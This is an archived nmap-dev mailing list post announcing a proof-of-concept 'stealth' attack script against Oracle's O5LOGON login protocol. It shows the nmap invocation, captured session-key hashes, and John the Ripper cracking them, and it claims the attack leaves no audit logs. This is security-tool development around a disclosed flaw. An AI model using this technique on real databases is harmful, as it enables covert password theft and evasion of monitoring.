Nmap Development mailing list archives

Re: Script suggestion - oracle


From: Dhiru Kholia <dhiru.kholia () gmail com>
Date: Sat, 6 Oct 2012 13:11:56 +0530

On Sat, Sep 29, 2012 at 10:40 PM, David Fifield <david () bamsoftware com> wrote:
> On Fri, Sep 28, 2012 at 10:59:14AM +0200, Martin Holst Swende wrote:
>> I took a look at this
>> http://marcel.vandewaters.nl/oracle/security/cryptographic-flaws-in-oracle-database-authentication-protocol
>>
>> Then checked tns.lua. Patrik has implemented TNS far enough it seems,
>> there is implementation support for enumerating users and getting the
>> salt (auth["AUTH_VFR_DATA"]) and session key.
>>
>> As I interpret the info given above and in the comments on
>> http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today%27s+Most+Popular
>> it seems like the session key is encrypted with SHA1(salt+pw), and it
>> is possible to determine whether the decryption is correct or not, and
>> thereby determine what the password is.
>>
>> More info about this will probably be released soon, would be a solid
>> script to add to NSE. Since enumeration is already implemented, a script
>> could just get all users and their passwords in one go. That's pretty
>> awesome.
>
> I made a script ideas entry for it.
>
> https://secwiki.org/w/Nmap/Script_Ideas#oracle-dump-hashes
>
> oracle-dump-hashes might not be the best name. I was thinking the script
> could just dump the keys or hashes or whatever, and an offline tool (or
> postrule script) could crack them.

I have written an NSE script for doing a stealth attack against the O5LOGON
protocol. This allows us to brute-force the session key(s) offline. I
have verified that using this script generates no alerts or logs on
the Oracle server.

The result of the "select os_username, username, userhost, action_name,
returncode from dba_audit_session where action_name = 'LOGON' and
username = 'SYS' and returncode > 0 order by timestamp;" query is
constant when this script is used.

✗ cat ~/passdb
wrongpassword

✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args
oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb
192.168.2.253 --datadir .

Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST
sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
Nmap scan report for 192.168.2.253
Host is up (0.00033s latency).
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     No valid accounts found
|   Statistics
|_    Performed 2 guesses in 1 seconds, average tps: 2

Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

➜  src git:(unstable-jumbo) ✗ cat ~/hashes
sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3

➜  src git:(unstable-jumbo) ✗ ../run/john ~/hashes
Loaded 2 password hashes with 2 different salts (Oracle O5LOGON
protocol [32/64])
password         (sys)
password         (sys)
guesses: 2  time: 0:00:00:00 DONE (Sat Oct  6 13:04:44 2012)  c/s:
3772  trying: password
Use the "--show" option to display all of the cracked passwords reliably

JtR has guessed the correct password although the nmap script tried to
log in with an incorrect password (wrongpassword)!

This script is just a PoC. It needs tons of work before it can go in.
Can an Nmap developer fix and commit it?

-- 
Cheers,
Dhiru

Attachment: 0001-PoC-Oracle-O5LOGON-stealth-attack.patch.gz

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/